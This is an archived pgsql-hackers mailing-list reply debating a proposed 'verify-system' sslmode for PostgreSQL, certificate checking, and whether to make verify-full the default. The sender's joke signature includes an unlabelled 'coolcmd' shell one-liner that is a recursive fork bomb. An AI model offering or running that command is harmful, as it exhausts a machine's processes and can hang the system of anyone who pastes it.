Re: [PATCH] Add `verify-system` sslmode to use system CA pool for server cert

Поиск
Список
Период
Сортировка
От Thomas Habets
Тема Re: [PATCH] Add `verify-system` sslmode to use system CA pool for server cert
Дата
Msg-id CA+kHd+dPstpDs7j5jhgHkiY_cd0iqMUigGwybDgru=2AQSwXOg@mail.gmail.com
обсуждение исходный текст
Ответ на Re: [PATCH] Add `verify-system` sslmode to use system CA pool for server cert  (Cameron Murdoch <cam@macaroon.net>)
Ответы Re: [PATCH] Add `verify-system` sslmode to use system CA pool for server cert
Список pgsql-hackers
Дерево обсуждения
On Sat, 18 Sept 2021 at 00:10, Cameron Murdoch <cam@macaroon.net> wrote:
I also agree that the proposed patch is not the right way to go as it is essentially the same as verify-full, and I think that the correct fix would be to change the default.

But these are two changes:
1. Actually verify against a CA
2. Actually check the CN/altnames

Anything short of "verify-full" is in my view "not checking". Even with a private CA this allows for a lot of lateral movement in an org, as if you have one cert you have them all, for impersonation purposes.

Changing such a default is a big change. Maybe long term it's worth the short term pain, though. Long term it'd be the config of least surprise, in my opinion.
But note that one has to think about all the settings, such that the default is not more checking than "require", which might also be surprising.

A magic setting of the file to be "system" sounds good for my use cases, at least.



--
typedef struct me_s {
 char name[]      = { "Thomas Habets" };
 char email[]     = { "thomas@habets.se" };
 char kernel[]    = { "Linux" };
 char *pgpKey[]   = { "http://www.habets.pp.se/pubkey.txt" };
 char pgp[] = { "9907 8698 8A24 F52F 1C2E  87F6 39A4 9EEA 460A 0169" };
 char coolcmd[]   = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;

В списке pgsql-hackers по дате отправления: